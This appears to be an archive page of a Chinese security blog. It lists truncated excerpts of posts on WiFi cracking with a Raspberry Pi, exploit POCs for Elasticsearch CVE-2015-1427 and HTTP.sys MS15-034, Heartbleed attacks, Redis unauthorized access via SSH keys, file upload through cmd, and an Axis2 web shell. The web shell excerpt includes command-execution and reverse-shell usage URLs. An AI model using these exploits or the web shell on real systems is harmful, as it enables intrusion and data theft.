树莓派(raspberrypi)安装aircrack-ng,reaver及wifi破解教程

树莓派(raspberrypi)安装aircrack-ng,reaver及wifi破解教程
硬件环境 树莓派B+一个(我用的是debian环境) PC一台(或其它设备直接操作PI就行) 无线网卡(能用就行,不过强大的无线网卡会事半功倍,我用的3070) 安装依赖包 sudo apt-get install -y libpcap-dev libsqlite3-dev sqlite3 libpcap0.8-dev libssl-dev build-essential iw tshark subversion sudo apt-get install libnl-3-200 libnl-3-dev libnl-3-d...
2016年04月30日 汪洋大海 暂无评论 喜欢 0 阅读 5,246 views 次 阅读全文

树莓派 安装 kali linux需要以下设置

树莓派 安装 kali linux需要以下设置
树莓派可以说是极客的最爱,可以根据不同的需求去做定制。 前文《使用树莓派和kali Linux打造便携式渗透套件》讲了一些使用树莓派的基础,主要侧重于将树莓派当作一个物理后门使用。我则更喜欢将树莓派当作一个服务器,去做一些metasploit会话反弹,xssme等一些轻量级的渗透测试业务。 硬件: raspberry pi 2 32G SD卡 软件: kali-2.0.1-rpi 下载地址: http://images.kali.or...
2016年04月30日 汪洋大海 暂无评论 喜欢 0 阅读 6,554 views 次 阅读全文

CVE-2015-1427 EXP pthon POC

CVE-2015-1427 EXP pthon POC
首先说说代码来源:https://github.com/XiphosResearch/exploits/tree/master/ElasticSearch 非常霸道的脚本。 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 #!/bin/python2 # coding: utf-8 # Author: Darren Martyn, Xiphos Research Ltd. # V...
2016年04月20日 汪洋大海 暂无评论 喜欢 0 阅读 3,118 views 次 阅读全文

http-cve2015-1635 EXP HTTP.sys 远程执行代码(CVE-2015-1635 MS15-034)

http-cve2015-1635 EXP HTTP.sys 远程执行代码(CVE-2015-1635 MS15-034)
本执行代码转载网络来源地址:http://www.securitysift.com/an-analysis-of-ms15-034/ 本人经过汉化了,如果看着汉化的不顺眼可以自己去用原版。。。。 http-vuln-cve2015-1635.nse HTTP.sys 远程执行代码exp 网上的试验了几个都不好使,不知道为什么,但是下面的这个本人亲测,绝对可以用de POC。 把下方代码保存为 xxxx.py 试用方法: xxxx.py http://ip(换成你要攻...
2016年04月20日 汪洋大海 暂无评论 喜欢 0 阅读 7,855 views 次 阅读全文

OpenSSL Heartbleed “心脏滴血”漏洞简单攻击示例

OpenSSL Heartbleed “心脏滴血”漏洞简单攻击示例
OpenSSL Heartbleed漏洞的公开和流行让许多人兴奋了一把,也让另一些人惊慌了一把。 单纯从攻击的角度讲,我已知道的,网上公开的扫描工具有: 1.  Nmap脚本ssl-heartbleed.nse: http://nmap.org/nsedoc/scripts/ssl-heartbleed.html 1 nmap -sV --script=ssl-heartbleed <target>   若想要批量寻找攻击目标,可以直接扫目标IP段的443端口。...
2016年04月18日 汪洋大海 OpenSSL Heartbleed “心脏滴血”漏洞简单攻击示例已关闭评论 喜欢 0 阅读 4,567 views 次 阅读全文

Axis2 Web Shell

Axis2 Web Shell
axis2 web shell 使用介绍: 1、命令执行 http://1.1.1.1/services/config/exec?cmd=whoami (不说了,执行命令。注意:xml换行没有处理好) 2、反弹shell http://1.1.1.1/services/config/shell?host=1.1.1.1&port=5555 (Linux则使用bash反弹shell,Windows则会进行socket执行shell) 3、文件上传 http://1.1.1.1/services/config/upload?path=/opt/tomcat/webapps/ROOT/sh...
2016年04月15日 汪洋大海 暂无评论 喜欢 0 阅读 4,551 views 次 阅读全文

渗透技巧——通过cmd上传文件的N种方法

渗透技巧——通过cmd上传文件的N种方法
0x00 前言 在渗透测试的过程中,常常需要向目标主机上传文件,我在最近的学习测试过程中就碰到了这个问题,要求只能通过cmd shell向目标主机(Windows系统)上传文件,所以本文就对该技巧做一下总结。 0x02 测试环境 OS:Win7 x86 test exe:ssss2.exe,成功运行后输出1 0x03 通用上传方法 1、 debug debug是一个程序调试工具,功能包括: 直接输入,更改,跟踪,运行汇...
2016年04月14日 汪洋大海 暂无评论 喜欢 0 阅读 2,985 views 次 阅读全文

Redis 未授权访问配合 SSH key 文件利用分析

Redis 未授权访问配合 SSH key 文件利用分析
Redis是一个开源的使用ANSI C语言编写、支持网络、可基于内存亦可持久化的日志型、Key-Value数据库,并提供多种语言的API。 Redis 未授权访问的问题是一直存在的问题,知道创宇安全研究团队历史上也做过相关的应急,今日,又出现 Redis 未授权访问配合 SSH key 文件被利用的情况,导致一大批 Redis 服务器被黑,今天我们来简要的分析下。 一、漏洞概述 Redis 默认情况下,会...
2016年04月11日 汪洋大海 暂无评论 喜欢 0 阅读 2,737 views 次 阅读全文

php多线程采集_PHP CURL 多线程 GET/POST 类

php多线程采集_PHP CURL 多线程 GET/POST 类
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 <?php /**************************************************************** PHP CURL 多线程 GET/POST curl(array('url?get=data','url'),array('','post_data')); *****************************************************************/ function curl($u...
2016年04月11日 汪洋大海 暂无评论 喜欢 0 阅读 3,471 views 次 阅读全文

树莓派3b 安装kali linux 如何配置

树莓派3b 安装kali linux 如何配置
首先下载:下载地址: http://images.kali.org/kali-2.0.1-rpi2.img.xz   针对树莓派最好的扩展工具是raspi-config,在kali1的源中也是存在的,但在2.0版本中则被移除了,只好手动安装。 首先从http://archive.raspberrypi.org/debian/pool/main/r/raspi-config/下载最新的raspi-config,然后解决依赖: apt-get install triggerhappy lua5.1 alsa-utils dpkg -i ra...
2016年04月08日 汪洋大海 暂无评论 喜欢 1 阅读 3,051 views 次 阅读全文